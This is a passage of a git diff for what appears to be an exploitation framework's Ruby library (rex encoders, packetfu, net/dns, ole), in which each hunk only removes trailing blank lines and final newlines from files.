+70,4 @@ class UdpTimeout < DnsTimeout # :nodoc: all end class DnsTimeoutArgumentError < ArgumentError # :nodoc: all -end +end \ No newline at end of file diff --git a/lib/net/dns/rr.rb b/lib/net/dns/rr.rb index bf91dde8f7..432fde8d97 100644 --- a/lib/net/dns/rr.rb +++ b/lib/net/dns/rr.rb @@ -402,5 +402,4 @@ end class Hash # :nodoc: include ExtendHash -end - +end \ No newline at end of file diff --git a/lib/net/dns/rr/a.rb b/lib/net/dns/rr/a.rb index 99e360f5da..c7c3991a6a 100644 --- a/lib/net/dns/rr/a.rb +++ b/lib/net/dns/rr/a.rb @@ -116,6 +116,4 @@ module Net # :nodoc: end # class RR end # module DNS -end # module Net - - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/aaaa.rb b/lib/net/dns/rr/aaaa.rb index 72dabcb8a7..a4337262d6 100644 --- a/lib/net/dns/rr/aaaa.rb +++ b/lib/net/dns/rr/aaaa.rb @@ -87,6 +87,4 @@ module Net end # class RR end # module DNS -end # module Net - - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/classes.rb b/lib/net/dns/rr/classes.rb index 25fd0c0486..0f991c8a49 100644 --- a/lib/net/dns/rr/classes.rb +++ b/lib/net/dns/rr/classes.rb @@ -145,4 +145,4 @@ module Net # :nodoc: end # module Net class ClassArgumentError < ArgumentError # :nodoc: -end +end \ No newline at end of file diff --git a/lib/net/dns/rr/cname.rb b/lib/net/dns/rr/cname.rb index 1a2bf94821..92adf1de0d 100644 --- a/lib/net/dns/rr/cname.rb +++ b/lib/net/dns/rr/cname.rb @@ -64,6 +64,4 @@ module Net end # class RR end # module DNS -end # module Net - - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/hinfo.rb b/lib/net/dns/rr/hinfo.rb index 688a10fe4e..9729368f8c 100644 --- a/lib/net/dns/rr/hinfo.rb +++ b/lib/net/dns/rr/hinfo.rb @@ -70,5 +70,4 @@ module Net end # class RR end # module DNS -end # module Net - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/mr.rb b/lib/net/dns/rr/mr.rb index 57e81fc992..9708310164 100644 --- a/lib/net/dns/rr/mr.rb +++ b/lib/net/dns/rr/mr.rb @@ -64,5 +64,4 @@ module Net end # class RR end # module DNS -end # module Net - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/mx.rb b/lib/net/dns/rr/mx.rb index 3da050b593..4a99b485c8 100644 --- a/lib/net/dns/rr/mx.rb +++ b/lib/net/dns/rr/mx.rb @@ -68,7 +68,4 @@ module Net end # class RR end # module DNS -end # module Net - - - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/ns.rb b/lib/net/dns/rr/ns.rb index 1999f9e579..8ec635bc85 100644 --- a/lib/net/dns/rr/ns.rb +++ b/lib/net/dns/rr/ns.rb @@ -64,7 +64,4 @@ module Net end # class RR end # module DNS -end # module Net - - - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/null.rb b/lib/net/dns/rr/null.rb index 2eeaab8b27..faff9e8f74 100644 --- a/lib/net/dns/rr/null.rb +++ b/lib/net/dns/rr/null.rb @@ -57,5 +57,4 @@ module Net end # class RR end # module DNS -end # module Net - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/ptr.rb b/lib/net/dns/rr/ptr.rb index cf6c2b415e..3383999756 100644 --- a/lib/net/dns/rr/ptr.rb +++ b/lib/net/dns/rr/ptr.rb @@ -67,5 +67,4 @@ module Net end # class RR end # module DNS -end # module Net - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/soa.rb b/lib/net/dns/rr/soa.rb index 05c7ae34b1..70aa8e386c 100644 --- a/lib/net/dns/rr/soa.rb +++ b/lib/net/dns/rr/soa.rb @@ -81,5 +81,4 @@ module Net end # class RR end # module DNS -end # module Net - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/srv.rb b/lib/net/dns/rr/srv.rb index eaa52a9696..b97c31d7c8 100644 --- a/lib/net/dns/rr/srv.rb +++ b/lib/net/dns/rr/srv.rb @@ -51,7 +51,4 @@ module Net end # module DNS -end # module Net - - - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/txt.rb b/lib/net/dns/rr/txt.rb index c182f5f072..97c5d70499 100644 --- a/lib/net/dns/rr/txt.rb +++ b/lib/net/dns/rr/txt.rb @@ -65,8 +65,4 @@ module Net end # class RR end # module DNS -end # module Net - - - - +end # module Net \ No newline at end of file diff --git a/lib/net/dns/rr/types.rb b/lib/net/dns/rr/types.rb index 57f19a894e..ad7e07631f 100644 --- a/lib/net/dns/rr/types.rb +++ b/lib/net/dns/rr/types.rb @@ -197,4 +197,4 @@ module Net # :nodoc: end # module Net class TypeArgumentError < ArgumentError # :nodoc: -end +end \ No newline at end of file diff --git a/lib/ole/base.rb b/lib/ole/base.rb index 3b54c06756..33f5d2c4d1 100644 --- a/lib/ole/base.rb +++ b/lib/ole/base.rb @@ -2,5 +2,4 @@ module Ole # :nodoc: require 'ole/support' Log = Logger.new_with_callstack -end - +end \ No newline at end of file diff --git a/lib/ole/file_system.rb b/lib/ole/file_system.rb index 5c2bd8c140..dd22d3e2c8 100644 --- a/lib/ole/file_system.rb +++ b/lib/ole/file_system.rb @@ -166,5 +166,4 @@ module Ole end end end -end - +end \ No newline at end of file diff --git a/lib/ole/io_helpers.rb b/lib/ole/io_helpers.rb index 405263d220..33319fa688 100644 --- a/lib/ole/io_helpers.rb +++ b/lib/ole/io_helpers.rb @@ -182,5 +182,4 @@ class RangesIO "#<#{self.class} io=#{io.inspect} size=#@size pos=#@pos "\ "current_range=#{range_str}>" end -end - +end \ No newline at end of file diff --git a/lib/ole/storage.rb b/lib/ole/storage.rb index f0af93372e..31974946d6 100755 --- a/lib/ole/storage.rb +++ b/lib/ole/storage.rb @@ -931,5 +931,4 @@ end if $0 == __FILE__ puts Ole::Storage.open(ARGV[0]) { |ole| ole.root.to_tree } -end - +end \ No newline at end of file diff --git a/lib/ole/support.rb b/lib/ole/support.rb index 746a62722e..d9a500e118 100644 --- a/lib/ole/support.rb +++ b/lib/ole/support.rb @@ -48,5 +48,4 @@ class Logger # :nodoc: end log end -end - +end \ No newline at end of file diff --git a/lib/ole/types.rb b/lib/ole/types.rb index f3a36cfd7a..2536f6eb91 100644 --- a/lib/ole/types.rb +++ b/lib/ole/types.rb @@ -24,5 +24,4 @@ module Ole # :nodoc: "{%08x-%04x-%04x-%02x%02x-#{'%02x' * 6}}" % str.unpack('L S S CC C6') end end -end - +end \ No newline at end of file diff --git a/lib/packetfu.rb b/lib/packetfu.rb index 0221513843..f8c80c9b2c 100644 --- a/lib/packetfu.rb +++ b/lib/packetfu.rb @@ -67,4 +67,4 @@ module PacketFu "0.1.0" # September 13, 2008 end -end +end \ No newline at end of file diff --git a/lib/packetfu/arp.rb b/lib/packetfu/arp.rb index 7493f53b5b..99933915e7 100644 --- a/lib/packetfu/arp.rb +++ b/lib/packetfu/arp.rb @@ -173,5 +173,4 @@ module PacketFu end # class ARPPacket -end # module PacketFu - +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/capture.rb b/lib/packetfu/capture.rb index a508530749..bf1757787a 100644 --- a/lib/packetfu/capture.rb +++ b/lib/packetfu/capture.rb @@ -161,5 +161,4 @@ module PacketFu end end # class Capture -end # module PacketFu - +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/config.rb b/lib/packetfu/config.rb index 4422b2518f..f4cedf78c8 100644 --- a/lib/packetfu/config.rb +++ b/lib/packetfu/config.rb @@ -51,4 +51,4 @@ module PacketFu end -end +end \ No newline at end of file diff --git a/lib/packetfu/eth.rb b/lib/packetfu/eth.rb index d643cbfc97..81867b7d63 100644 --- a/lib/packetfu/eth.rb +++ b/lib/packetfu/eth.rb @@ -157,4 +157,4 @@ module PacketFu end -end # module PacketFu +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/icmp.rb b/lib/packetfu/icmp.rb index e67caf8d0d..768c7ec545 100644 --- a/lib/packetfu/icmp.rb +++ b/lib/packetfu/icmp.rb @@ -108,5 +108,4 @@ module PacketFu end end -end # module PacketFu - +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/inject.rb b/lib/packetfu/inject.rb index 72a3f1c726..d370181315 100644 --- a/lib/packetfu/inject.rb +++ b/lib/packetfu/inject.rb @@ -63,5 +63,4 @@ module PacketFu end end -end - +end \ No newline at end of file diff --git a/lib/packetfu/invalid.rb b/lib/packetfu/invalid.rb index e573dbe0d2..617d6261c5 100644 --- a/lib/packetfu/invalid.rb +++ b/lib/packetfu/invalid.rb @@ -20,4 +20,4 @@ module PacketFu end end -end # module PacketFu +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/ip.rb b/lib/packetfu/ip.rb index c7b0a32643..635d0850a4 100644 --- a/lib/packetfu/ip.rb +++ b/lib/packetfu/ip.rb @@ -226,4 +226,4 @@ module PacketFu end -end # module PacketFu +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/ipv6.rb b/lib/packetfu/ipv6.rb index ae959f5c93..72a13be87a 100644 --- a/lib/packetfu/ipv6.rb +++ b/lib/packetfu/ipv6.rb @@ -135,4 +135,4 @@ module PacketFu end # class IPv6Packet -end # module PacketFu +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/packet.rb b/lib/packetfu/packet.rb index 14f8b35a10..238ba9bfa3 100644 --- a/lib/packetfu/packet.rb +++ b/lib/packetfu/packet.rb @@ -332,5 +332,4 @@ module PacketFu end # class Packet -end # module PacketFu - +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/pcap.rb b/lib/packetfu/pcap.rb index 2dc9b86479..1169c2906b 100644 --- a/lib/packetfu/pcap.rb +++ b/lib/packetfu/pcap.rb @@ -35,5 +35,4 @@ module PacketFu pcap_header :head pcap_packets :body end -end - +end \ No newline at end of file diff --git a/lib/packetfu/read.rb b/lib/packetfu/read.rb index b2188cef34..b5e79a5476 100644 --- a/lib/packetfu/read.rb +++ b/lib/packetfu/read.rb @@ -54,4 +54,4 @@ module PacketFu #:startdoc: end -end +end \ No newline at end of file diff --git a/lib/packetfu/tcp.rb b/lib/packetfu/tcp.rb index 53d35ddd34..3ff7fa772b 100644 --- a/lib/packetfu/tcp.rb +++ b/lib/packetfu/tcp.rb @@ -358,5 +358,4 @@ module PacketFu end -end # module PacketFu - +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/tcpopts.rb b/lib/packetfu/tcpopts.rb index f580b0a18a..4da55baa60 100644 --- a/lib/packetfu/tcpopts.rb +++ b/lib/packetfu/tcpopts.rb @@ -209,5 +209,4 @@ module PacketFu end end end -end - +end \ No newline at end of file diff --git a/lib/packetfu/udp.rb b/lib/packetfu/udp.rb index 76c3f40055..77206ef35d 100644 --- a/lib/packetfu/udp.rb +++ b/lib/packetfu/udp.rb @@ -148,5 +148,4 @@ module PacketFu end -end # module PacketFu - +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/utils.rb b/lib/packetfu/utils.rb index 8f20a23796..91d7023707 100644 --- a/lib/packetfu/utils.rb +++ b/lib/packetfu/utils.rb @@ -124,5 +124,4 @@ module PacketFu end # class Utils -end # module PacketFu - +end # module PacketFu \ No newline at end of file diff --git a/lib/packetfu/write.rb b/lib/packetfu/write.rb index 434bebe97a..840de90ab3 100644 --- a/lib/packetfu/write.rb +++ b/lib/packetfu/write.rb @@ -87,5 +87,4 @@ module PacketFu #:startdoc: end -end - +end \ No newline at end of file diff --git a/lib/rabal/tree.rb b/lib/rabal/tree.rb index d2d9ec4f11..f843915b6a 100644 --- a/lib/rabal/tree.rb +++ b/lib/rabal/tree.rb @@ -241,4 +241,4 @@ class Tree def each_datum self.walk(self,lambda { |tree| yield tree.data}) end -end +end \ No newline at end of file diff --git a/lib/rex.rb b/lib/rex.rb index 0a794488bd..e275577b29 100644 --- a/lib/rex.rb +++ b/lib/rex.rb @@ -98,5 +98,4 @@ Kernel.class_eval(" def select(rfd = nil, wfd = nil, efd = nil, to = nil) Rex::ThreadSafe.select(rfd, wfd, efd, to) end -") - +") \ No newline at end of file diff --git a/lib/rex.rb.ts.rb b/lib/rex.rb.ts.rb index 5a247cb74a..078ec209c3 100644 --- a/lib/rex.rb.ts.rb +++ b/lib/rex.rb.ts.rb @@ -67,4 +67,4 @@ require 'rex/ui/text/color.rb.ut' require 'rex/ui/text/table.rb.ut' require 'rex/exploitation/egghunter.rb.ut' -require 'rex/exploitation/seh.rb.ut' +require 'rex/exploitation/seh.rb.ut' \ No newline at end of file diff --git a/lib/rex/arch.rb b/lib/rex/arch.rb index 4b04a303a5..91137434f7 100644 --- a/lib/rex/arch.rb +++ b/lib/rex/arch.rb @@ -86,4 +86,4 @@ module Arch end end -end +end \ No newline at end of file diff --git a/lib/rex/arch/sparc.rb b/lib/rex/arch/sparc.rb index 7fd1c93ab8..7c4c907ae2 100644 --- a/lib/rex/arch/sparc.rb +++ b/lib/rex/arch/sparc.rb @@ -72,4 +72,4 @@ module Sparc end -end end +end end \ No newline at end of file diff --git a/lib/rex/arch/sparc.rb.ut.rb b/lib/rex/arch/sparc.rb.ut.rb index 92bac960bb..04a973eec0 100644 --- a/lib/rex/arch/sparc.rb.ut.rb +++ b/lib/rex/arch/sparc.rb.ut.rb @@ -15,4 +15,4 @@ class Rex::Arch::Sparc::UnitTest < ::Test::Unit::TestCase assert_equal("\x09\x00\x00\x08\x88\x11\x22\x22", Klass.set(0x2222, 'g4')) end -end +end \ No newline at end of file diff --git a/lib/rex/arch/x86.rb b/lib/rex/arch/x86.rb index 7e60b33f58..66208fb70d 100644 --- a/lib/rex/arch/x86.rb +++ b/lib/rex/arch/x86.rb @@ -495,4 +495,4 @@ module X86 end -end end +end end \ No newline at end of file diff --git a/lib/rex/arch/x86.rb.ut.rb b/lib/rex/arch/x86.rb.ut.rb index 7b1bb63265..78048d8f8e 100644 --- a/lib/rex/arch/x86.rb.ut.rb +++ b/lib/rex/arch/x86.rb.ut.rb @@ -90,4 +90,4 @@ class Rex::Arch::X86::UnitTest < ::Test::Unit::TestCase assert_equal(s, Klass.searcher("\x04\x03\x02\x01")) end -end +end \ No newline at end of file diff --git a/lib/rex/assembly/nasm.rb b/lib/rex/assembly/nasm.rb index c8db21ffd5..b8b5eb93a6 100644 --- a/lib/rex/assembly/nasm.rb +++ b/lib/rex/assembly/nasm.rb @@ -98,4 +98,4 @@ class Nasm end end -end +end \ No newline at end of file diff --git a/lib/rex/assembly/nasm.rb.ut.rb b/lib/rex/assembly/nasm.rb.ut.rb index a6579e01df..66333ef912 100644 --- a/lib/rex/assembly/nasm.rb.ut.rb +++ b/lib/rex/assembly/nasm.rb.ut.rb @@ -19,4 +19,4 @@ class Rex::Assembly::Nasm::UnitTest < ::Test::Unit::TestCase assert_equal("00000000 31C0 xor eax,eax\n", Klass.disassemble("\x31\xc0")) end -end +end \ No newline at end of file diff --git a/lib/rex/compat.rb b/lib/rex/compat.rb index 263f7e7659..a2f7f26920 100644 --- a/lib/rex/compat.rb +++ b/lib/rex/compat.rb @@ -276,5 +276,4 @@ end end -end - +end \ No newline at end of file diff --git a/lib/rex/constants.rb b/lib/rex/constants.rb index 53a7aa6e96..fc81f6a194 100644 --- a/lib/rex/constants.rb +++ b/lib/rex/constants.rb @@ -99,5 +99,4 @@ ENDIAN_LITTLE = 0 ENDIAN_BIG = 1 IS_ENDIAN_LITTLE = ( [1].pack('s')[0] == 1 ) ? true : false -IS_ENDIAN_BIG = ( not IS_ENDIAN_LITTLE ) - +IS_ENDIAN_BIG = ( not IS_ENDIAN_LITTLE ) \ No newline at end of file diff --git a/lib/rex/encoder/alpha2.rb b/lib/rex/encoder/alpha2.rb index 3db46b0996..b3983f62b7 100644 --- a/lib/rex/encoder/alpha2.rb +++ b/lib/rex/encoder/alpha2.rb @@ -28,4 +28,4 @@ require 'rex/encoder/alpha2/generic' require 'rex/encoder/alpha2/alpha_mixed' require 'rex/encoder/alpha2/alpha_upper' require 'rex/encoder/alpha2/unicode_mixed' -require 'rex/encoder/alpha2/unicode_upper' +require 'rex/encoder/alpha2/unicode_upper' \ No newline at end of file diff --git a/lib/rex/encoder/alpha2/alpha_mixed.rb b/lib/rex/encoder/alpha2/alpha_mixed.rb index f68089063e..8acfb8dcca 100644 --- a/lib/rex/encoder/alpha2/alpha_mixed.rb +++ b/lib/rex/encoder/alpha2/alpha_mixed.rb @@ -61,4 +61,4 @@ class AlphaMixed < Generic return decoder end -end end end end +end end end end \ No newline at end of file diff --git a/lib/rex/encoder/alpha2/alpha_upper.rb b/lib/rex/encoder/alpha2/alpha_upper.rb index e9da1efcd5..3c568d76e6 100644 --- a/lib/rex/encoder/alpha2/alpha_upper.rb +++ b/lib/rex/encoder/alpha2/alpha_upper.rb @@ -72,4 +72,4 @@ class AlphaUpper < Generic return decoder end -end end end end +end end end end \ No newline at end of file diff --git a/lib/rex/encoder/alpha2/generic.rb b/lib/rex/encoder/alpha2/generic.rb index 7e972a7859..b0b73f08e7 100644 --- a/lib/rex/encoder/alpha2/generic.rb +++ b/lib/rex/encoder/alpha2/generic.rb @@ -96,4 +96,4 @@ class Generic 'AA' end -end end end end +end end end end \ No newline at end of file diff --git a/lib/rex/encoder/alpha2/unicode_mixed.rb b/lib/rex/encoder/alpha2/unicode_mixed.rb index e0a9e16d0d..c19774d372 100644 --- a/lib/rex/encoder/alpha2/unicode_mixed.rb +++ b/lib/rex/encoder/alpha2/unicode_mixed.rb @@ -114,4 +114,4 @@ class UnicodeMixed < Generic return decoder end -end end end end +end end end end \ No newline at end of file diff --git a/lib/rex/encoder/alpha2/unicode_upper.rb b/lib/rex/encoder/alpha2/unicode_upper.rb index bd838568dc..a22c10f6c4 100644 --- a/lib/rex/encoder/alpha2/unicode_upper.rb +++ b/lib/rex/encoder/alpha2/unicode_upper.rb @@ -126,4 +126,4 @@ class UnicodeUpper < Generic return decoder end -end end end end +end end end end \ No newline at end of file diff --git a/lib/rex/encoder/ndr.rb b/lib/rex/encoder/ndr.rb index d40f3a9a59..64ab568720 100644 --- a/lib/rex/encoder/ndr.rb +++ b/lib/rex/encoder/ndr.rb @@ -85,4 +85,4 @@ module NDR end end -end +end \ No newline at end of file diff --git a/lib/rex/encoder/ndr.rb.ut.rb b/lib/rex/encoder/ndr.rb.ut.rb index b4034cc673..a3d00c89a3 100644 --- a/lib/rex/encoder/ndr.rb.ut.rb +++ b/lib/rex/encoder/ndr.rb.ut.rb @@ -41,4 +41,4 @@ class Rex::Encoder::NDR::UnitTest < Test::Unit::TestCase assert_equal(16, Klass.wstring_prebuilt('aa' + "\x00\x00").length, 'wstring_prebuilt length') end -end +end \ No newline at end of file diff --git a/lib/rex/encoder/nonalpha.rb b/lib/rex/encoder/nonalpha.rb index c8a8ca8143..bf4dc1a41b 100644 --- a/lib/rex/encoder/nonalpha.rb +++ b/lib/rex/encoder/nonalpha.rb @@ -61,4 +61,4 @@ class NonAlpha encoded += nonascii end -end end end +end end end \ No newline at end of file diff --git a/lib/rex/encoder/nonupper.rb b/lib/rex/encoder/nonupper.rb index 1450adb38d..fc6635309d 100644 --- a/lib/rex/encoder/nonupper.rb +++ b/lib/rex/encoder/nonupper.rb @@ -61,4 +61,4 @@ class NonUpper encoded += nonascii end -end end end +end end end \ No newline at end of file diff --git a/lib/rex/encoder/xdr.rb b/lib/rex/encoder/xdr.rb index a33d1e7ced..3fdabe6b98 100644 --- a/lib/rex/encoder/xdr.rb +++ b/lib/rex/encoder/xdr.rb @@ -102,4 +102,4 @@ module XDR end end -end +end \ No newline at end of file diff --git a/lib/rex/encoder/xdr.rb.ut.rb b/lib/rex/encoder/xdr.rb.ut.rb index 3c982276ab..7cf490f2c2 100644 --- a/lib/rex/encoder/xdr.rb.ut.rb +++ b/lib/rex/encoder/xdr.rb.ut.rb @@ -26,4 +26,4 @@ class Rex::Encoder::XDR::UnitTest < Test::Unit::TestCase assert_equal([1,2,3], Rex::Encoder::XDR.decode_varray!("\000\000\000\003\000\000\000\001\000\000\000\002\000\000\000\003") { |i| Rex::Encoder::XDR.decode_int!(i) } , 'decode_varray!') assert_equal(1234, Rex::Encoder::XDR.decode_lchar!("\377\377\377\322"), 'decode_lchar!') end -end +end \ No newline at end of file diff --git a/lib/rex/encoder/xor.rb b/lib/rex/encoder/xor.rb index 898b0716bf..992d82bd71 100644 --- a/lib/rex/encoder/xor.rb +++ b/lib/rex/encoder/xor.rb @@ -65,4 +65,4 @@ class Xor end -end end +end end \ No newline at end of file diff --git a/lib/rex/encoder/xor/dword.rb b/lib/rex/encoder/xor/dword.rb index 3bfb29baa7..d639abcbc0 100644 --- a/lib/rex/encoder/xor/dword.rb +++ b/lib/rex/encoder/xor/dword.rb @@ -10,4 +10,4 @@ require 'rex/encoding/xor/dword' ### class Rex::Encoder::Xor::Dword < Rex::Encoder::Xor EncoderKlass = Rex::Encoding::Xor::Dword -end +end \ No newline at end of file diff --git a/lib/rex/encoder/xor/dword_additive.rb b/lib/rex/encoder/xor/dword_additive.rb index b63f9df198..488d483637 100644 --- a/lib/rex/encoder/xor/dword_additive.rb +++ b/lib/rex/encoder/xor/dword_additive.rb @@ -10,4 +10,4 @@ require 'rex/encoding/xor/dword_additive' ### class Rex::Encoder::Xor::DwordAdditive < Rex::Encoder::Xor EncoderKlass = Rex::Encoding::Xor::DwordAdditive -end +end \ No newline at end of file diff --git a/lib/rex/encoders/xor_dword.rb b/lib/rex/encoders/xor_dword.rb index 3319c09c0d..6484513661 100644 --- a/lib/rex/encoders/xor_dword.rb +++ b/lib/rex/encoders/xor_dword.rb @@ -32,4 +32,4 @@ class XorDword < Rex::Encoder::Xor::Dword include Backend end -end end +end end \ No newline at end of file diff --git a/lib/rex/encoders/xor_dword.rb.ut.rb b/lib/rex/encoders/xor_dword.rb.ut.rb index 2602c8009f..59d4183e3f 100644 --- a/lib/rex/encoders/xor_dword.rb.ut.rb +++ b/lib/rex/encoders/xor_dword.rb.ut.rb @@ -20,4 +20,4 @@ class Rex::Encoders::XorDword::UnitTest < ::Test::Unit::TestCase assert_equal(nil, MachineTest.testraw(klass.encode(buffer + "\xcc"))) } end -end +end \ No newline at end of file diff --git a/lib/rex/encoders/xor_dword_additive.rb b/lib/rex/encoders/xor_dword_additive.rb index a6ef4b5866..da2c5ebb06 100644 --- a/lib/rex/encoders/xor_dword_additive.rb +++ b/lib/rex/encoders/xor_dword_additive.rb @@ -50,4 +50,4 @@ class XorDwordAdditive < Rex::Encoder::Xor::DwordAdditive include Backend end -end end +end end \ No newline at end of file diff --git a/lib/rex/encoders/xor_dword_additive.rb.ut.rb b/lib/rex/encoders/xor_dword_additive.rb.ut.rb index f71a470cdd..9874a945e6 100644 --- a/lib/rex/encoders/xor_dword_additive.rb.ut.rb +++ b/lib/rex/encoders/xor_dword_additive.rb.ut.rb @@ -9,4 +9,4 @@ require 'rex/encoders/xor_dword.rb.ut' class Rex::Encoders::XorDwordAdditive::UnitTest < Rex::Encoders::XorDword::UnitTest Klass = Rex::Encoders::XorDwordAdditive -end +end \ No newline at end of file diff --git a/lib/rex/encoding/xor.rb b/lib/rex/encoding/xor.rb index 22bc3bf6df..3d96d14b26 100644 --- a/lib/rex/encoding/xor.rb +++ b/lib/rex/encoding/xor.rb @@ -16,4 +16,4 @@ end end end require 'rex/encoding/xor/generic' require 'rex/encoding/xor/byte' require 'rex/encoding/xor/word' -require 'rex/encoding/xor/dword' +require 'rex/encoding/xor/dword' \ No newline at end of file diff --git a/lib/rex/encoding/xor.rb.ts.rb b/lib/rex/encoding/xor.rb.ts.rb index 85d34c080e..9f057ce504 100644 --- a/lib/rex/encoding/xor.rb.ts.rb +++ b/lib/rex/encoding/xor.rb.ts.rb @@ -11,4 +11,4 @@ require 'rex/encoding/xor/generic.rb.ut' require 'rex/encoding/xor/byte.rb.ut' require 'rex/encoding/xor/word.rb.ut' require 'rex/encoding/xor/dword.rb.ut' -require 'rex/encoding/xor/dword_additive.rb.ut' +require 'rex/encoding/xor/dword_additive.rb.ut' \ No newline at end of file diff --git a/lib/rex/encoding/xor/byte.rb b/lib/rex/encoding/xor/byte.rb index a72ae4ca2a..af7b162b9f 100644 --- a/lib/rex/encoding/xor/byte.rb +++ b/lib/rex/encoding/xor/byte.rb @@ -12,4 +12,4 @@ class Byte < Generic 1 end -end end end end # Byte/Xor/Encoding/Rex +end end end end # Byte/Xor/Encoding/Rex \ No newline at end of file diff --git a/lib/rex/encoding/xor/byte.rb.ut.rb b/lib/rex/encoding/xor/byte.rb.ut.rb index 902d351b53..f98aa375cb 100644 --- a/lib/rex/encoding/xor/byte.rb.ut.rb +++ b/lib/rex/encoding/xor/byte.rb.ut.rb @@ -18,4 +18,4 @@ class Byte::UnitTest < Generic::UnitTest Byte end end -end +end \ No newline at end of file diff --git a/lib/rex/encoding/xor/dword.rb b/lib/rex/encoding/xor/dword.rb index f4bea0b2af..f74fd839c6 100644 --- a/lib/rex/encoding/xor/dword.rb +++ b/lib/rex/encoding/xor/dword.rb @@ -18,4 +18,4 @@ class Dword < Generic 4 end -end end end end # Dword/Xor/Encoding/Rex +end end end end # Dword/Xor/Encoding/Rex \ No newline at end of file diff --git a/lib/rex/encoding/xor/dword.rb.ut.rb b/lib/rex/encoding/xor/dword.rb.ut.rb index 819db54c09..5f1d339313 100644 --- a/lib/rex/encoding/xor/dword.rb.ut.rb +++ b/lib/rex/encoding/xor/dword.rb.ut.rb @@ -12,4 +12,4 @@ class Dword::UnitTest < Byte::UnitTest Dword end end -end +end \ No newline at end of file diff --git a/lib/rex/encoding/xor/dword_additive.rb b/lib/rex/encoding/xor/dword_additive.rb index 534178828b..3324856b5e 100644 --- a/lib/rex/encoding/xor/dword_additive.rb +++ b/lib/rex/encoding/xor/dword_additive.rb @@ -88,4 +88,4 @@ class DwordAdditive < Generic return key end -end end end end # DwordAdditive/Xor/Encoding/Rex +end end end end # DwordAdditive/Xor/Encoding/Rex \ No newline at end of file diff --git a/lib/rex/encoding/xor/dword_additive.rb.ut.rb b/lib/rex/encoding/xor/dword_additive.rb.ut.rb index ef398a92c2..4d7a957040 100644 --- a/lib/rex/encoding/xor/dword_additive.rb.ut.rb +++ b/lib/rex/encoding/xor/dword_additive.rb.ut.rb @@ -12,4 +12,4 @@ class DwordAdditive::UnitTest < Byte::UnitTest DwordAdditive end end -end +end \ No newline at end of file diff --git a/lib/rex/encoding/xor/exceptions.rb b/lib/rex/encoding/xor/exceptions.rb index 9729844cae..5cb4e2ebd8 100644 --- a/lib/rex/encoding/xor/exceptions.rb +++ b/lib/rex/encoding/xor/exceptions.rb @@ -16,4 +16,4 @@ class KeySearchError < ::Exception MSG = "Error finding a key." end -end end end +end end end \ No newline at end of file diff --git a/lib/rex/encoding/xor/generic.rb b/lib/rex/encoding/xor/generic.rb index 11c2507207..f533fbbeee 100644 --- a/lib/rex/encoding/xor/generic.rb +++ b/lib/rex/encoding/xor/generic.rb @@ -143,4 +143,4 @@ class Generic end -end end end end # Generic/Xor/Encoding/Rex +end end end end # Generic/Xor/Encoding/Rex \ No newline at end of file diff --git a/lib/rex/encoding/xor/generic.rb.ut.rb b/lib/rex/encoding/xor/generic.rb.ut.rb index 3ac2f7d92c..330343ea9c 100644 --- a/lib/rex/encoding/xor/generic.rb.ut.rb +++ b/lib/rex/encoding/xor/generic.rb.ut.rb @@ -117,4 +117,4 @@ class Generic::UnitTest < ::Test::Unit::TestCase ] end end -end +end \ No newline at end of file diff --git a/lib/rex/encoding/xor/word.rb b/lib/rex/encoding/xor/word.rb index a3b9d5c6e3..725ea9acea 100644 --- a/lib/rex/encoding/xor/word.rb +++ b/lib/rex/encoding/xor/word.rb @@ -18,4 +18,4 @@ class Word < Generic 2 end -end end end end # Word/Xor/Encoding/Rex +end end end end # Word/Xor/Encoding/Rex \ No newline at end of file diff --git a/lib/rex/encoding/xor/word.rb.ut.rb b/lib/rex/encoding/xor/word.rb.ut.rb index a7b1918c95..6d9a4f84cb 100644 --- a/lib/rex/encoding/xor/word.rb.ut.rb +++ b/lib/rex/encoding/xor/word.rb.ut.rb @@ -10,4 +10,4 @@ class Rex::Encoding::Xor::Word::UnitTest < Rex::Encoding::Xor::Byte::UnitTest def enc Rex::Encoding::Xor::Word end -end +end \ No newline at end of file diff --git a/lib/rex/exceptions.rb b/lib/rex/exceptions.rb index 71b014fe34..35332c0faf 100644 --- a/lib/rex/exceptions.rb +++ b/lib/rex/exceptions.rb @@ -240,4 +240,4 @@ class UnsupportedProtocol < ::ArgumentError attr_accessor :proto end -end +end \ No newline at end of file diff --git a/lib/rex/exceptions.rb.ut.rb b/lib/rex/exceptions.rb.ut.rb index 61963da29d..6e5e118668 100644 --- a/lib/rex/exceptions.rb.ut.rb +++ b/lib/rex/exceptions.rb.ut.rb @@ -41,4 +41,4 @@ class UnitTest < Test::Unit::TestCase end end -end +end \ No newline at end of file diff --git a/lib/rex/exploitation/egghunter.rb b/lib/rex/exploitation/egghunter.rb index bfdcd7e29e..34065d26de 100644 --- a/lib/rex/exploitation/egghunter.rb +++ b/lib/rex/exploitation/egghunter.rb @@ -140,4 +140,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/exploitation/egghunter.rb.ut.rb b/lib/rex/exploitation/egghunter.rb.ut.rb index a79f678c7f..2615b25f9a 100644 --- a/lib/rex/exploitation/egghunter.rb.ut.rb +++ b/lib/rex/exploitation/egghunter.rb.ut.rb @@ -22,4 +22,4 @@ class Rex::Exploitation::Egghunter::UnitTest < Test::Unit::TestCase assert_not_nil(r.generate[1]) end -end +end \ No newline at end of file diff --git a/lib/rex/exploitation/heaplib.rb b/lib/rex/exploitation/heaplib.rb index 7ed4d19401..2d8cbf5ab5 100644 --- 